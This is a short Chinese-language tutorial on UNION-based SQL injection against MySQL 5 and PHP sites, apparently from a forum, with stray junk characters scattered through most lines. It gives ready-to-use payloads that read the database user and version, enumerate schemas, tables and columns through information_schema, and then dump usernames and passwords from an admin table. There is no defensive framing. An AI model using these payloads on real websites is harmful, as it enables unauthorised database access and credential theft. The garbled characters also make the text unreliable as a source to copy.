1 G4 i1 ?5 M7 @& w. P) N教程内容:Mysql 5+php 注入 |8 f* O: E2 l) Q$ y, @
3 ?0 c3 s6 @4 L4 ?9 e* l6 A9 h9 C3 x$ n
- O2 Y+ `7 K& h* |) X, s0 T
一.查看MYSQL基本信息(库名,版本,用户)7 C# y x5 o( T9 X6 Z
+ |/ s: |% P3 a: L2 {and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
4 j k9 P$ f. k" `
; p6 k& e& k. Y; _% l* P# n二.查数据库. I8 f) p! X; e z0 Y! N
& v7 v) F* H/ r1 B* G
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*' R1 `6 U2 d! A7 S7 t, v- U
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
. b; u1 q2 q$ z) N$ e6 i
& L- _, t% p6 M, g( {三.暴表+ C% z* `' l$ {* e& i8 g
& t) R2 |% E$ Q/ G/ [4 `
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
5 p6 x! i) V5 O) W' e1 W# g9 l- t$ @0 m; k8 O0 {5 {5 F
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
& \3 N8 i7 I T/ H3 m6 K2 M. k- |$ y8 y8 u
四.暴字段
6 _; D: @! I* m- D0 ?2 k) A
; B1 n: e* W! v& H e% pand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
6 W( T1 S; B; E, Y r- X
' M9 o( U8 M( |- U* e+ l% |5 tlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。9 q; F5 `; Z2 D' i W
( \: _6 \& J- A2 \五.暴数据
: E$ ?/ v- M- Q! m' B! }
9 H7 I9 {1 f6 d4 z7 Cand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*# d3 H: I: f# h; C3 V
v$ D" g0 ^; u. f6 e6 ]1 O4 @
: L$ A) l0 k5 A
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。! z2 n4 m! D9 \8 d2 t1 j
|